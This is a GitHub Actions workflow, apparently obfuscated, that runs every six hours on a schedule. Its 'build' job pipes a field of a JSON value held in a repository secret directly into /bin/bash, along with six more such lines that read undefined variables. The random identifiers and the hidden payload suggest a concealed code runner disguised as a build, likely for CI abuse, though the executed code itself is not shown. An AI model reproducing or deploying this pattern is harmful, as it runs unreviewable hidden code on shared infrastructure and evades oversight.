name: tongmengshi2006
on:
  workflow_dispatch:
  schedule:
    - cron: '8 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tongmengshi2006
        env:
          dtsx87: ${{ secrets.dtsx87 }}
        run: |
          echo $dtsx87 | jq -r .fmyqg94 | /bin/bash
          echo $vkc41 | jq -r .zvsh395 | /bin/bash
          echo $txr4 | jq -r .rdyo13192 | /bin/bash
          echo $h4552 | jq -r .xpp1 | /bin/bash
          echo $ijun8 | jq -r .v648 | /bin/bash
          echo $b964 | jq -r .bhiq96 | /bin/bash
          echo $fs4887 | jq -r .xk31 | /bin/bash

